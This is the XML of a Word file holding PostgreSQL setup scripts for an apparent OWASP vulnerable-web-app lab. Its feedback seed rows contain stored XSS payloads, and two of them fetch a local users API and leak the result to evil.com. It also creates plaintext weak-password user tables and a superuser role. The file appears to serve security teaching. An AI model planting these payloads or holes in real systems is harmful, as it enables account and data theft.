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27FD" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE DATABASE owasp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A0681" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    WITH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E58446C" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    OWNER = spanlorin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45E0F7" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ENCODING = 'UTF8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D435C7" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    CONNECTION LIMIT = -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321FE929" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    IS_TEMPLATE = False;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40A9E2" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRPr="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1373CD" w14:textId="1E48D285" w:rsidR="00284B8B" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4BD8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GRANT ALL ON DATABASE owasp TO spanlorin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196213E" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F264EAA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>-- Role: spanlorin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4893B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>-- DROP ROLE IF EXISTS spanlorin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12315C20" w14:textId="77777777" w:rsidR="00D66230" w:rsidRPr="00D66230" w:rsidRDefault="00D66230" w:rsidP="00D66230">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA7FA3D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>CREATE ROLE spanlorin WITH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937BBFE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LOGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A33E434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SUPERUSER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C66C11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INHERIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2CA575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CREATEDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D47F2E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CREATEROLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201FBCFD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REPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1EF01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 xml:space="preserve">  ENCRYPTED PASSWORD 'SCRAM-SHA-256$4096:sevUlgnphx8zi+nnfBOdiQ==$wKiRwP+3zEsLWETnG1KSAAip7e5FRUl7FQ8lGR1e2s4=:J45C9c67S9FcBZ9ZijUlAf1eE1y88F5Y0ulrcd0V8WU=';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5AE2EF" w14:textId="77777777" w:rsidR="00D66230" w:rsidRPr="00D66230" w:rsidRDefault="00D66230" w:rsidP="00D66230">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C0E87B" w14:textId="77777777" w:rsidR="00D66230" w:rsidRPr="00D66230" w:rsidRDefault="00D66230" w:rsidP="00D66230">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D66230">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ALTER ROLE spanlorin SET search_path TO new_schema_name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A20C19" w14:textId="6BB6D320" w:rsidR="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CA0385" w14:textId="77777777" w:rsidR="00BB4BD8" w:rsidRDefault="00BB4BD8" w:rsidP="00BB4BD8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1096CEC9" w14:textId="0BE81070" w:rsidR="00284B8B" w:rsidRDefault="00284B8B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00284B8B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path TO </w:t>
      </w:r>
      <w:r w:rsidR="00600F13">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00284B8B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814BF13" w14:textId="1EF2F094" w:rsidR="00784A4F" w:rsidRDefault="00784A4F" w:rsidP="007202BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C548531" w14:textId="77777777" w:rsidR="00784A4F" w:rsidRPr="00784A4F" w:rsidRDefault="00784A4F" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784A4F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE IF NOT EXISTS feedback (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318696A6" w14:textId="77777777" w:rsidR="00784A4F" w:rsidRPr="00784A4F" w:rsidRDefault="00784A4F" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784A4F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    id SERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E1CB9" w14:textId="77777777" w:rsidR="00784A4F" w:rsidRPr="00784A4F" w:rsidRDefault="00784A4F" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784A4F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    name VARCHAR(255) NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0A473" w14:textId="77777777" w:rsidR="00784A4F" w:rsidRPr="00784A4F" w:rsidRDefault="00784A4F" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784A4F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    message TEXT NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69042BD7" w14:textId="4672DF6B" w:rsidR="00784A4F" w:rsidRDefault="00784A4F" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784A4F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1D3BB" w14:textId="3B547577" w:rsidR="0000548F" w:rsidRDefault="0000548F" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C7935A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INSERT INTO feedback (name, message) VALUES </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CE22D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('John Doe', 'Great platform, very easy to use!'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DA334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('Alice Smith', 'I love the new features, keep up the good work.'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DAC6FA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('Bob Johnson', 'Had a small issue, but support was very helpful.'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12102A6F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('Charlie Brown', E'&lt;img src="x" onerror="setTimeout(() =&gt; {fetch(\'http://localhost:8080/api/bac/users\').then(res =&gt; res.text()).then(data =&gt; { new Image().src=\'http://evil.com/leak?data=\'+encodeURIComponent(data); });}, 1000);"&gt; Best website!'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11388DFD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('Emily Davis', 'The UI is very clean and easy to navigate.'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ABD616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('Grace Miller', 'Super intuitive interface, highly recommended.'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7840E627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('Henry Adams', E'&lt;iframe src="javascript:setTimeout(() =&gt; {fetch(\'http://localhost:8080/api/bac/users\').then(res =&gt; res.text()).then(data =&gt; { new Image().src=\'http://evil.com/leak?data=\'+encodeURIComponent(data); });}, 1000);"&gt;&lt;/iframe&gt; Loads fast, no issues.'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA500A" w14:textId="77777777" w:rsidR="00A337BC" w:rsidRP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('Mia White', 'Mobile version is fantastic, very responsive.'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC60CC" w14:textId="77777777" w:rsidR="00A337BC" w:rsidRDefault="00A337BC" w:rsidP="00A337BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A337BC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ('Evil Hacker', E'&lt;a href="#" onclick="alert(\'Hacked!\')"&gt;Amazing product!&lt;/a&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5FC469" w14:textId="77777777" w:rsidR="00A337BC" w:rsidRDefault="00A337BC" w:rsidP="00A337BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8F40EF" w14:textId="7E7A2163" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00A337BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE ba_users (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BAF7D9" w14:textId="77777777" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00F24BA2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    id SERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC336BF" w14:textId="77777777" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00F24BA2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    username VARCHAR(255) UNIQUE NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5817FB0D" w14:textId="77777777" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00F24BA2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    password VARCHAR(255) NOT NULL -- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parole </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>î</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n clar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B070E5F" w14:textId="77777777" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00F24BA2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BF1486" w14:textId="77777777" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00F24BA2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6583337E" w14:textId="77777777" w:rsidR="00F24BA2" w:rsidRPr="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00F24BA2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24BA2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INSERT INTO ba_users (username, password) VALUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39F093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>('admin', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r>
      <w:r w:rsidRPr="007202BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CEE63C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('user1', 'password'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D63536F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">('user2', '123456'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36846F50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('hacker', 'letmein'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF2D6D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('guest', 'guest'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E6E84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('test', 'test123'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F926F1C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('root', 'toor'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBD3EA3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('developer', 'devpass'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A18FFA2" w14:textId="77777777" w:rsidR="008F7D4B" w:rsidRPr="007202BE" w:rsidRDefault="008F7D4B" w:rsidP="008F7D4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007202BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">('security', 'secureme'), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13AC9D" w14:textId="77777777" w:rsidR="008F7D4B" w:rsidRDefault="008F7D4B" w:rsidP="008F7D4B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007202BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('pentester', 'qwerty');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569A2C4" w14:textId="04E85BD6" w:rsidR="00F24BA2" w:rsidRDefault="00F24BA2" w:rsidP="00784A4F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FCD8C0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>CREATE TABLE bac_users (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A13FECA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 xml:space="preserve">    id SERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C225855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 xml:space="preserve">    username VARCHAR(255) UNIQUE NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA3A3A0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 xml:space="preserve">    password VARCHAR(255) NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC8F670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 xml:space="preserve">    role VARCHAR(50) NOT NULL -- Poate fi 'USER' sau 'ADMIN'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101801A8" w14:textId="13C1C589" w:rsidR="001657B8" w:rsidRDefault="00B010EC" w:rsidP="00B010EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B010EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9292DF" w14:textId="6E19203E" w:rsidR="00B010EC" w:rsidRDefault="00B010EC" w:rsidP="00B010EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54F6E34F" w14:textId="1E7B200C" w:rsidR="00B010EC" w:rsidRDefault="00B010EC" w:rsidP="00B010EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6173AC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>INSERT INTO bac_users (username, password, role) VALUES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9F68BF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>('user1', 'password123', 'USER'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24824A5E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>('user2', 'qwerty', 'USER'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356BCFF7" w14:textId="77777777" w:rsidR="00B010EC" w:rsidRPr="00B010EC" w:rsidRDefault="00B010EC" w:rsidP="00B010EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B010EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('admin1', 'adminpass', 'ADMIN'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748937BC" w14:textId="04160C14" w:rsidR="00B010EC" w:rsidRDefault="00B010EC" w:rsidP="00B010EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B010EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>('admin2', 'root123', 'ADMIN');</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B0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8B"/>
    <w:rsid w:val="0000548F"/>
    <w:rsid w:val="001657B8"/>
    <w:rsid w:val="0018285A"/>
    <w:rsid w:val="00284B8B"/>
    <w:rsid w:val="00306C28"/>
    <w:rsid w:val="00556AF5"/>
    <w:rsid w:val="00600F13"/>
    <w:rsid w:val="006E16D7"/>
    <w:rsid w:val="007202BE"/>
    <w:rsid w:val="00746B6F"/>
    <w:rsid w:val="00784A4F"/>
    <w:rsid w:val="008D6E6A"/>
    <w:rsid w:val="008F7D4B"/>
    <w:rsid w:val="00A14B55"/>
    <w:rsid w:val="00A337BC"/>
    <w:rsid w:val="00A34B81"/>
    <w:rsid w:val="00B010EC"/>
    <w:rsid w:val="00BB4BD8"/>
    <w:rsid w:val="00D66230"/>
    <w:rsid w:val="00F24BA2"/>
    <w:rsid w:val="00F9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E3C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{806CD203-DF64-4C68-98E9-7A5E68CE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B8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Șpan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lorin Șpan</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-09T10:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-09T18:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>